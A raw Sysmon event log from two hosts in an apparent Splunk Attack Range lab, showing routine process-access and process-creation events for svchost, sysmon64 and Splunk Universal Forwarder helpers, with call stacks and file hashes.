10341000x800000000000000032700Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:32.023{FF16AF91-26B6-6013-0C00-00000000A401}6121040C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791
10341000x800000000000000032699Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:32.023{FF16AF91-26B6-6013-0C00-00000000A401}6121040C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791
10341000x800000000000000032698Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:32.023{FF16AF91-26B4-6013-0500-00000000A401}6441200C:\Windows\system32\csrss.exe{FF16AF91-36D0-6013-6903-00000000A401}1128C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f
10341000x800000000000000032697Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:32.023{FF16AF91-26C7-6013-3400-00000000A401}36964500C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{FF16AF91-36D0-6013-6903-00000000A401}1128C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791
154100x800000000000000032696Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:32.023{FF16AF91-36D0-6013-6903-00000000A401}1128C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{FF16AF91-26B5-6013-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{FF16AF91-26C7-6013-3400-00000000A401}3696C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service
10341000x8000000000000000359988Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:32.317{8e433fbf-36d0-6013-9503-000000001100}20602948C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{8e433fbf-2a45-6013-4f00-000000001100}3740C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000359987Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:32.160{8e433fbf-2a47-6013-6600-000000001100}53205376C:\Windows\system32\conhost.exe{8e433fbf-36d0-6013-9503-000000001100}2060C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\system32\conhost.exe+1260d|C:\Windows\system32\conhost.exe+12505|C:\Windows\system32\conhost.exe+895c|C:\Windows\system32\conhost.exe+f2e6|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000359986Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:32.160{8e433fbf-2a44-6013-1200-000000001100}11641580C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+111b6|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000359985Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:32.160{8e433fbf-2a44-6013-1200-000000001100}11641580C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+106fe|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000359984Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:32.160{8e433fbf-2a44-6013-1200-000000001100}11641580C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+108a0|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000359983Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:32.160{8e433fbf-2a44-6013-1200-000000001100}11641580C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+10225|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000359982Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:32.160{8e433fbf-2a44-6013-0600-000000001100}756772C:\Windows\system32\csrss.exe{8e433fbf-36d0-6013-9503-000000001100}2060C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\system32\basesrv.DLL+2fba|C:\Windows\SYSTEM32\CSRSRV.dll+5af4|C:\Windows\SYSTEM32\ntdll.dll+6cedf
10341000x8000000000000000359981Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:32.160{8e433fbf-2a45-6013-4f00-000000001100}37406536C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{8e433fbf-36d0-6013-9503-000000001100}2060C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9d934|C:\Windows\System32\KERNELBASE.dll+5f32a|C:\Windows\System32\KERNELBASE.dll+5bcc6|C:\Windows\System32\KERNEL32.DLL+1be93|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+20e72|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
154100x8000000000000000359980Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:32.161{8e433fbf-36d0-6013-9503-000000001100}2060C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{8e433fbf-2a44-6013-e703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{8e433fbf-2a45-6013-4f00-000000001100}3740C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service
10341000x8000000000000000359998Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:33.192{8e433fbf-2a46-6013-5700-000000001100}34164116C:\Windows\System32\svchost.exe{8e433fbf-2a45-6013-4c00-000000001100}3676C:\Program Files\Amazon\Ec2ConfigService\Ec2Config.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|c:\windows\system32\rasmans.dll+3751b|c:\windows\system32\rasmans.dll+36fad|c:\windows\system32\rasmans.dll+10ed8|c:\windows\system32\rasmans.dll+33cd5|C:\Windows\System32\svchost.exe+314c|C:\Windows\System32\sechost.dll+2de2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x800000000000000032713Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:34.351{FF16AF91-26B7-6013-0D00-00000000A401}10046532C:\Windows\system32\svchost.exe{FF16AF91-26E0-6013-8200-00000000A401}4736C:\Windows\System32\rdpclip.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791
10341000x8000000000000000360014Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:40.837{8e433fbf-2a47-6013-6600-000000001100}53205376C:\Windows\system32\conhost.exe{8e433fbf-36d8-6013-9803-000000001100}8592C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\system32\conhost.exe+1260d|C:\Windows\system32\conhost.exe+12505|C:\Windows\system32\conhost.exe+895c|C:\Windows\system32\conhost.exe+f2e6|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000360013Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:40.837{8e433fbf-2a44-6013-1200-000000001100}11641580C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+111b6|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000360012Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:40.837{8e433fbf-2a44-6013-1200-000000001100}11641580C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+106fe|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000360011Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:40.837{8e433fbf-2a44-6013-1200-000000001100}11641580C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+108a0|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000360010Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:40.837{8e433fbf-2a44-6013-1200-000000001100}11641580C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+10225|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000360009Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:40.837{8e433fbf-2a44-6013-0600-000000001100}756772C:\Windows\system32\csrss.exe{8e433fbf-36d8-6013-9803-000000001100}8592C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\system32\basesrv.DLL+2fba|C:\Windows\SYSTEM32\CSRSRV.dll+5af4|C:\Windows\SYSTEM32\ntdll.dll+6cedf
10341000x8000000000000000360008Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:40.837{8e433fbf-2a45-6013-4f00-000000001100}37406536C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{8e433fbf-36d8-6013-9803-000000001100}8592C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9d934|C:\Windows\System32\KERNELBASE.dll+5f32a|C:\Windows\System32\KERNELBASE.dll+5bcc6|C:\Windows\System32\KERNEL32.DLL+1be93|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+20e72|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
154100x8000000000000000360007Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:40.838{8e433fbf-36d8-6013-9803-000000001100}8592C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{8e433fbf-2a44-6013-e703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{8e433fbf-2a45-6013-4f00-000000001100}3740C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service
10341000x8000000000000000360006Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:40.165{8e433fbf-2a47-6013-6600-000000001100}53205376C:\Windows\system32\conhost.exe{8e433fbf-36d8-6013-9703-000000001100}10344C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\system32\conhost.exe+1260d|C:\Windows\system32\conhost.exe+12505|C:\Windows\system32\conhost.exe+895c|C:\Windows\system32\conhost.exe+f2e6|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000360005Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:40.165{8e433fbf-2a44-6013-1200-000000001100}11641580C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+111b6|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000360004Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:40.165{8e433fbf-2a44-6013-1200-000000001100}11641580C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+106fe|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000360003Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:40.165{8e433fbf-2a44-6013-1200-000000001100}11641580C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+108a0|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000360002Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 